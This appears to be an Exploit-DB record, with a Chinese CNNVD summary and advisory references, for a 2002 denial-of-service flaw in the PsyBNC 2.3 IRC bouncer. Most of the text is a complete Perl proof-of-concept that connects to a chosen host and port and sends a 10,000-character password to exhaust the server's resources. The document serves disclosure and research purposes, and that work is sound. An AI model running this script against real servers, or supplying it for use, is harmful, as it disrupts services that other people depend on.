https://www.exploit-db.com/exploits/21409
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200208-140

psyBNC是一款免费开放源代码的IRC反弹(bouncing)服务程序，可以运行在Unix和Linux操作系统下。PsyBNC对用户发送超长的密码字符串缺少正确处理，可导致服务程序拒绝服务。攻击者可以连接到PsyBNC服务程序，并发送超过9000字符的密码信息，然后断开连接，PsyBNC服务进程不会崩溃，但是进程会消耗大量资源，过多的类似攻击可以导致系统拒绝响应正常服务。

source: http://www.securityfocus.com/bid/4570/info

PsyBNC is a freely available, open source IRC bouncing server. It is available for the UNIX and Linux operating systems.

Under some circumstances, it is possible for a remote user to crash a vulnerable server. Upon connection to a vulnerable system, if a user sends a password of 9000 or more characters, and disconnects from the system, the server process does not die. Instead, the process continues to live and consume a large amount of resources.


#!/usr/bin/perl
#PsyBNC 2.3 Remote DDOS POC
#By DVDMAN ([email protected])
#WWW.L33TSECURITY.COM
#L33T SECURITY

use Getopt::Std;
use IO::Socket;
$|=1;


my %options;
getopt('Hhp',%options);
$arg2 = shift(@ARGV);
$options{h} && usage();
if ($options{H})
{
do_psy();
}
if ($options{p})
{
do_psy();
}
else
{
usage();
}
sub usage()
{
    print("[L33TSECURITY]  PsyBNC 2.3 Remote DDOSn");
    print(" (C) DVDMAN nn");
    print("Usage: $0 [options]n");
    print("-H = hostname or ip REQUIREDn");
    print("-p = port of PSYBNC server REQUIREDn");
}
  
exit(1);

 

sub do_psy() {
my $test = $options{H};
my $test2 = $options{p};

    $remote = IO::Socket::INET->new(
                        Proto     => "tcp",
                                PeerAddr  => $test,
                                PeerPort  => $test2,
        );
    unless ($remote) {
           print"error cannot connect";
           return
        }
    $remote->autoflush(1);


print STDERR "PsyBNC REMOTE DDOS BY DVDMANn";
print STDERR " starting attack in 5 seconds...n";
sleep(5);

my $user = "USER OWNED OWNED OWNED OWNED OWNEDrn";
my $nick = "NICK OWNEDrn";
my $pw = "PASS " . "A"x10000;

print $remote $user;
print $remote $nick;
print $remote $pw;
print STDERR "DONEn"; 
die "BYEn";
}





#By DVDMAN ([email protected])
#WWW.L33TSECURITY.COM
#L33T SECURITY

来源:BID
名称:4570
链接:http://www.securityfocus.com/bid/4570
来源:XF
名称:psybnc-long-password-dos(8912)
链接:http://www.iss.net/security_center/static/8912.php
来源:BUGTRAQ
名称:20020423PsyBNCRemoteDosPOC
链接:http://online.securityfocus.com/archive/1/269131
来源:BUGTRAQ
名称:20020422Re:psyBNC2.3DoS/Bug
链接:http://archives.neohapsis.com/archives/bugtraq/2002-04/0322.html